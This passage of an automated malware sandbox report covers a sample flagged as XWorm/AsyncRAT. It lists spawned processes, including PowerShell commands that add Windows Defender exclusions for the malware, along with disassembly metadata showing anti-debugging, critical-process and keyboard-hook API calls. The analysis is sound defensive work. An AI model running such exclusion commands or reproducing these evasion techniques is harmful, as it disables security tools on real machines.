                                                                                                    Path:C:\Users\user\Desktop\2QaN4hOyJs.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\Desktop\2QaN4hOyJs.exe"
                                                                                                    Imagebase:0xe40000
                                                                                                    File size:171'520 bytes
                                                                                                    MD5 hash:0999F25F0123E520BB0259A5741F621B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1332506285.0000000000E42000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1332506285.0000000000E42000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1332506285.0000000000E42000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2615632586.0000000013191000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2615632586.0000000013191000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2615632586.0000000013191000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2609307176.0000000003191000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:2
                                                                                                    Start time:13:14:03
                                                                                                    Start date:20/12/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe'
                                                                                                    Imagebase:0x7ff760310000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:3
                                                                                                    Start time:13:14:04
                                                                                                    Start date:20/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff70f010000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:5
                                                                                                    Start time:13:14:11
                                                                                                    Start date:20/12/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '2QaN4hOyJs.exe'
                                                                                                    Imagebase:0x7ff760310000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:6
                                                                                                    Start time:13:14:11
                                                                                                    Start date:20/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff70f010000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:10
                                                                                                    Start time:13:14:22
                                                                                                    Start date:20/12/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\System'
                                                                                                    Imagebase:0x7ff760310000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:11
                                                                                                    Start time:13:14:22
                                                                                                    Start date:20/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff70f010000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:12
                                                                                                    Start time:13:14:37
                                                                                                    Start date:20/12/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System'
                                                                                                    Imagebase:0x7ff760310000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:13
                                                                                                    Start time:13:14:37
                                                                                                    Start date:20/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff70f010000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Disassembly

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:18%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:16.7%
                                                                                                      Total number of Nodes:18
                                                                                                      Total number of Limit Nodes:0

                                                                                                      Executed Functions

                                                                                                      Function 00007FF887D10610 Relevance: 14.5, Strings: 11, Instructions: 790COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 7ff887d10610-7ff887d10cba 3 7ff887d10cbc-7ff887d10cc2 0->3 4 7ff887d10cd4-7ff887d10d0f 0->4 5 7ff887d10cc9-7ff887d10cd2 3->5 10 7ff887d10d18-7ff887d10d1c 4->10 11 7ff887d10d11-7ff887d10d16 4->11 5->4 12 7ff887d10d1f-7ff887d10d39 10->12 11->12 14 7ff887d10d3b-7ff887d10d6d 12->14 15 7ff887d10d73-7ff887d10db9 12->15 22 7ff887d10dba-7ff887d10e00 14->22 23 7ff887d10d6f-7ff887d10d71 14->23 28 7ff887d115d2 22->28 29 7ff887d10e06-7ff887d10fc1 call 7ff887d10550 * 12 call 7ff887d10648 22->29 23->14 23->15 30 7ff887d115d7-7ff887d1161e 28->30 87 7ff887d10fcb-7ff887d11042 call 7ff887d104c8 call 7ff887d104c0 call 7ff887d10358 call 7ff887d10368 29->87 88 7ff887d10fc3-7ff887d10fca 29->88 103 7ff887d11044-7ff887d1104e 87->103 104 7ff887d11055-7ff887d11065 87->104 88->87 103->104 107 7ff887d1108d-7ff887d110ad 104->107 108 7ff887d11067-7ff887d11086 call 7ff887d10358 104->108 114 7ff887d110be-7ff887d111a0 107->114 115 7ff887d110af-7ff887d110b9 call 7ff887d10378 107->115 108->107 129 7ff887d111ee-7ff887d11221 114->129 130 7ff887d111a2-7ff887d111d5 114->130 115->114 141 7ff887d11223-7ff887d11244 129->141 142 7ff887d11246-7ff887d11276 129->142 130->129 137 7ff887d111d7-7ff887d111e4 130->137 137->129 140 7ff887d111e6-7ff887d111ec 137->140 140->129 144 7ff887d1127e-7ff887d112b5 141->144 142->144 150 7ff887d112da-7ff887d1130a 144->150 151 7ff887d112b7-7ff887d112d8 144->151 152 7ff887d11312-7ff887d113d3 call 7ff887d10388 call 7ff887d104b0 150->152 151->152 152->30 165 7ff887d113d9-7ff887d11421 152->165 165->30 170 7ff887d11427-7ff887d1148b call 7ff887d105e8 165->170 180 7ff887d11492-7ff887d1149b 170->180 180->28
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2629794096.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff887d10000_2QaN4hOyJs.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 6B$6B$6B$6B$"rB$0DL$0DL$8ML$/B$/B$CAO_^
                                                                                                      • API String ID: 0-4060078286
                                                                                                      • Opcode ID: 3d0739159c3a1ce58b8e1ef3078abfae1d267946eab7537cb4f1ecf4e72e2d3d
                                                                                                      • Instruction ID: 1f53902d2f166227d8883123c8fa903ae1970a6b49ae9b273f6b1dcf5bb6232f
                                                                                                      • Opcode Fuzzy Hash: 3d0739159c3a1ce58b8e1ef3078abfae1d267946eab7537cb4f1ecf4e72e2d3d
                                                                                                      • Instruction Fuzzy Hash: 1C32B320F58A094FE798FB78846937DB6E2FF99740F444579E00FD329ADE2CA8418752
                                                                                                      Function 00007FF887D11941 Relevance: 5.4, Strings: 4, Instructions: 390COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2629794096.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff887d10000_2QaN4hOyJs.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 6B$6B$6B$6B
                                                                                                      • API String ID: 0-1106462266
                                                                                                      • Opcode ID: e5dee6753e1296fdd0983c5a0e6f8de5dc9d9ea7dc23fbce6377a64a679e0f53
                                                                                                      • Instruction ID: 905927a6b14e79f3e09055e89a11b9c453ca4bcc5800949e3d9946327f811710
                                                                                                      • Opcode Fuzzy Hash: e5dee6753e1296fdd0983c5a0e6f8de5dc9d9ea7dc23fbce6377a64a679e0f53
                                                                                                      • Instruction Fuzzy Hash: B1C19130F1C9494FEB88EB6894653BDB7E2FF99344F045279D04FC3296DE29A8428752
                                                                                                      Function 00007FF887D125E3 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 592 7ff887d125e3-7ff887d170ed CheckRemoteDebuggerPresent 596 7ff887d170ef 592->596 597 7ff887d170f5-7ff887d17138 592->597 596->597
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2629794096.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff887d10000_2QaN4hOyJs.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CheckDebuggerPresentRemote
                                                                                                      • String ID:
                                                                                                      • API String ID: 3662101638-0
                                                                                                      • Opcode ID: e83c2ca233a81ae81373d2cd19d98cda61eb4469b507a4fa4408907a29247d5f
                                                                                                      • Instruction ID: 6949dc9387c89304ed962bfe3f1f8afa513e38e6e07d55cb340283b415ebc2d5
                                                                                                      • Opcode Fuzzy Hash: e83c2ca233a81ae81373d2cd19d98cda61eb4469b507a4fa4408907a29247d5f
                                                                                                      • Instruction Fuzzy Hash: 1931E23190861C8FDB58DF9CC84A7FDBBE0FF65321F04422AD48AD7252CB74A8468B91
                                                                                                      Function 00007FF887D15A86 Relevance: .5, Instructions: 472COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2629794096.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff887d10000_2QaN4hOyJs.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 01edc7ae7fe63a9df1713c20258941e7f5c56d33438d03c93a786644ec083658
                                                                                                      • Instruction ID: e0f0d583c9820bab1c1165cd21b729dfefbf8564e7ccc7e9d5b0423b9629c737
                                                                                                      • Opcode Fuzzy Hash: 01edc7ae7fe63a9df1713c20258941e7f5c56d33438d03c93a786644ec083658
                                                                                                      • Instruction Fuzzy Hash: CBF19330908A8D8FEBA8DF28C8557E977E1FF54350F04426EE84EC7295DB389945CB92
                                                                                                      Function 00007FF887D16832 Relevance: .5, Instructions: 458COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2629794096.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff887d10000_2QaN4hOyJs.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c4fc494f446fe6b98ef81660f5826e674e8867712660738fcfd74edbc13538c4
                                                                                                      • Instruction ID: 42f21e409a2fe45aa57d82389417dde49ea4f45704d4ff865e6d353e13520afd
                                                                                                      • Opcode Fuzzy Hash: c4fc494f446fe6b98ef81660f5826e674e8867712660738fcfd74edbc13538c4
                                                                                                      • Instruction Fuzzy Hash: 10E1A330908A8D8FEBA9DF28C8557E977E1FB55350F04826EE84EC7295DF389845CB81
                                                                                                      Function 00007FF887D1955D Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 549 7ff887d1955d-7ff887d19563 550 7ff887d19564-7ff887d19589 549->550 550->550 551 7ff887d1958b-7ff887d19640 RtlSetProcessIsCritical 550->551 555 7ff887d19648-7ff887d1967d 551->555 556 7ff887d19642 551->556 556->555
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2629794096.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff887d10000_2QaN4hOyJs.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 2695349919-0
                                                                                                      • Opcode ID: e2ad0e4bc128057c5480e47ddea0f5cdcfe8527d0aced77f7a8775faa62b65fc
                                                                                                      • Instruction ID: 3c443dd59140e5def8901b5f01e4f59a5dda3fb4e6042c23db5794b933ca6dbe
                                                                                                      • Opcode Fuzzy Hash: e2ad0e4bc128057c5480e47ddea0f5cdcfe8527d0aced77f7a8775faa62b65fc
                                                                                                      • Instruction Fuzzy Hash: C541F63180C6498FD719DF98D845BE9BBF0FF56311F04416ED08AD3592CB786846CBA1
                                                                                                      Function 00007FF887D1A0A8 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 571 7ff887d1a0a8-7ff887d1a0af 572 7ff887d1a0ba-7ff887d1a12d 571->572 573 7ff887d1a0b1-7ff887d1a0b9 571->573 577 7ff887d1a1b9-7ff887d1a1bd 572->577 578 7ff887d1a133-7ff887d1a140 572->578 573->572 579 7ff887d1a142-7ff887d1a17f SetWindowsHookExW 577->579 578->579 581 7ff887d1a181 579->581 582 7ff887d1a187-7ff887d1a1b8 579->582 581->582
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2629794096.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff887d10000_2QaN4hOyJs.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HookWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 2559412058-0
                                                                                                      • Opcode ID: 3c207570a36d0cd441582776412a3d32b3ca1dfd1525f89dd80f4d741e0c4bd2
                                                                                                      • Instruction ID: 79f99a631ee9af8752259e3b9c397e4dd4515e7fb02d26bb6d016e1f1e2acff0
                                                                                                      • Opcode Fuzzy Hash: 3c207570a36d0cd441582776412a3d32b3ca1dfd1525f89dd80f4d741e0c4bd2
                                                                                                      • Instruction Fuzzy Hash: 0E31D731A1CA5D5FDB18EB68D80A6F9BBE1FB59321F00427ED049D3292CF64A852C791
                                                                                                      Function 00007FF887D18DD8 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 558 7ff887d18dd8-7ff887d1a12d 563 7ff887d1a1b9-7ff887d1a1bd 558->563 564 7ff887d1a133-7ff887d1a140 558->564 565 7ff887d1a142-7ff887d1a17f SetWindowsHookExW 563->565 564->565 567 7ff887d1a181 565->567 568 7ff887d1a187-7ff887d1a1b8 565->568 567->568
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2629794096.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff887d10000_2QaN4hOyJs.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HookWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 2559412058-0
                                                                                                      • Opcode ID: e2e5fd24a46254e013556dfdafc13c4c79c448d96bce9049da6546c54ecf9d48
                                                                                                      • Instruction ID: de52206e6554dc043c666e55f87b9133c4852b759cfe87dd52928fee8d9cbe72
                                                                                                      • Opcode Fuzzy Hash: e2e5fd24a46254e013556dfdafc13c4c79c448d96bce9049da6546c54ecf9d48
                                                                                                      • Instruction Fuzzy Hash: EC31F630A0CA4C5FD758DB5898056BDB7E1FB99311F10423EE00AC3152DA64A842C791
                                                                                                      Function 00007FF887D17031 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 585 7ff887d17031-7ff887d170ed CheckRemoteDebuggerPresent 589 7ff887d170ef 585->589 590 7ff887d170f5-7ff887d17138 585->590 589->590
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2629794096.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff887d10000_2QaN4hOyJs.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CheckDebuggerPresentRemote
                                                                                                      • String ID:
                                                                                                      • API String ID: 3662101638-0
                                                                                                      • Opcode ID: 77138a7ff72cf823cc05518b46bddbd873dd5bdd3feb161f88347e38331048bc
                                                                                                      • Instruction ID: d3e12ebe2e1e095feeb853c9ca3ab2667ba2b34d6b2fbbda547fa07a54ac03b0
                                                                                                      • Opcode Fuzzy Hash: 77138a7ff72cf823cc05518b46bddbd873dd5bdd3feb161f88347e38331048bc
                                                                                                      • Instruction Fuzzy Hash: 8231E23190875C8FCB58DF98C84A7E9BBF0FF65321F05426AD489D7192DB34A846CB91

                                                                                                      Executed Functions

                                                                                                      Function 00007FF887E06660 Relevance: 1.6, Strings: 1, Instructions: 393COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1453297636.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_7ff887e00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: X7:
                                                                                                      • API String ID: 0-2847653297
                                                                                                      • Opcode ID: 07b06708f36893a076fad85182e79947d4dc4a47dee290d3e8bcbc72c3d1f49f
                                                                                                      • Instruction ID: c7bd490477c0da13f70fa6d3039ebc64f2fd00b3abc8cf0d04eba910c618de01
                                                                                                      • Opcode Fuzzy Hash: 07b06708f36893a076fad85182e79947d4dc4a47dee290d3e8bcbc72c3d1f49f
                                                                                                      • Instruction Fuzzy Hash: 95C10331D4DA8A8FE7A5EB6898156BD7BF1FF56B90B0801BED40DCB093DA1CA805C351
                                                                                                      Function 00007FF887E04073 Relevance: .2, Instructions: 183COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1453297636.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_7ff887e00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 63fccc51d626cf14c541d3979a2dfdcb2171a384243f67a4f3c52f1be3c94e8f
                                                                                                      • Instruction ID: 5740a6eeebf5e46425e4f6b263ccc3895267782f3f57b0e5a361c2bce029f0db
                                                                                                      • Opcode Fuzzy Hash: 63fccc51d626cf14c541d3979a2dfdcb2171a384243f67a4f3c52f1be3c94e8f
                                                                                                      • Instruction Fuzzy Hash: E9510632E4CA864FE7999A1C951167877E2FFA7B60B6801BEC00EC7593DE18EC15C381
                                                                                                      Function 00007FF887E04370 Relevance: .1, Instructions: 147COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1453297636.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_7ff887e00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: db16e8b2ee3b25a9200b9741197e8e859db3d5a43f32bc80b97ba2dfa307b553
                                                                                                      • Instruction ID: 464cc22290b0cbc6e4dd7dc38015cad83da5833130919ec9bd3e023bbbbd78fd
                                                                                                      • Opcode Fuzzy Hash: db16e8b2ee3b25a9200b9741197e8e859db3d5a43f32bc80b97ba2dfa307b553
                                                                                                      • Instruction Fuzzy Hash: 71412632E4DA894FE7A5D66CA4516BC77E1FF87AA0B0811BAC05DC7587EA1CAC11C381
                                                                                                      Function 00007FF887D39FEA Relevance: .1, Instructions: 146COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1452806507.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_7ff887d30000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4726e8d11bb74fb2b366dba29aae01b168958c988355876464e72f97f5105672
                                                                                                      • Instruction ID: 77735eef2ba165200b738c71c143e7399dfa5b8543ed6c8d949af5f757cc7fe1
                                                                                                      • Opcode Fuzzy Hash: 4726e8d11bb74fb2b366dba29aae01b168958c988355876464e72f97f5105672
                                                                                                      • Instruction Fuzzy Hash: 8141E977E489934FF342A66CAC560FD37A0FFA22A5B0C0177D0898F097FA191447C692
                                                                                                      Function 00007FF887D39738 Relevance: .1, Instructions: 146COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1452806507.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_7ff887d30000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fb1e15910c1085fd44917be07ec0e9f66eda12202a488db1cdf0c4209134d863
                                                                                                      • Instruction ID: 014c0dae5fa4146040d33424f3f0c7c2b8bebf064bf0eb2fe94fb3fe423be01c
                                                                                                      • Opcode Fuzzy Hash: fb1e15910c1085fd44917be07ec0e9f66eda12202a488db1cdf0c4209134d863
                                                                                                      • Instruction Fuzzy Hash: 18412D71D0CB898FE758AF5CA8066FD7BE0FB55311F00427FE04993296DA24A816C7C2
                                                                                                      Function 00007FF887C1E380 Relevance: .1, Instructions: 123COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1452409881.00007FF887C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C1D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_7ff887c1d000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6b14a27fa6e56c76490afbfdcd89a19586befcf1e1def3a96b8cc9a3796dae81
                                                                                                      • Instruction ID: 51db985ac8d3c7dcad6dff79ca1de3b204fe3d7f260c3409227281f73c40efb4
                                                                                                      • Opcode Fuzzy Hash: 6b14a27fa6e56c76490afbfdcd89a19586befcf1e1def3a96b8cc9a3796dae81
                                                                                                      • Instruction Fuzzy Hash: 3C41007080DBC44FE75A8B38E8459523FF0FF56365B1506EFD089CB1A3D625A84AC7A2
                                                                                                      Function 00007FF887D3A47C Relevance: .1, Instructions: 102COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1452806507.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_7ff887d30000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d56f0521a9222442e828214fe965118a945c0868f74a22b161be275e3b1937af
                                                                                                      • Instruction ID: 8ee11ed9a14f809ba1f436e9ccbf327a306c8f3eedb6c837f48ed8430867b37a
                                                                                                      • Opcode Fuzzy Hash: d56f0521a9222442e828214fe965118a945c0868f74a22b161be275e3b1937af
                                                                                                      • Instruction Fuzzy Hash: 9921483190C74C8FEB18DFAC9C4A7E97BF0EB96320F04426BD049C3156DA74A41ACB92
                                                                                                      Function 00007FF887E040BF Relevance: .1, Instructions: 98COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1453297636.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_7ff887e00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2a329a33f23f8c82734cc1e6439698990a84e2e11eab2b6815b9d820f62ce1c3
                                                                                                      • Instruction ID: 17ae8eaa1cfb00e265368a252cd782ea22f5acbc9a3439f72ec2b63320fdf731
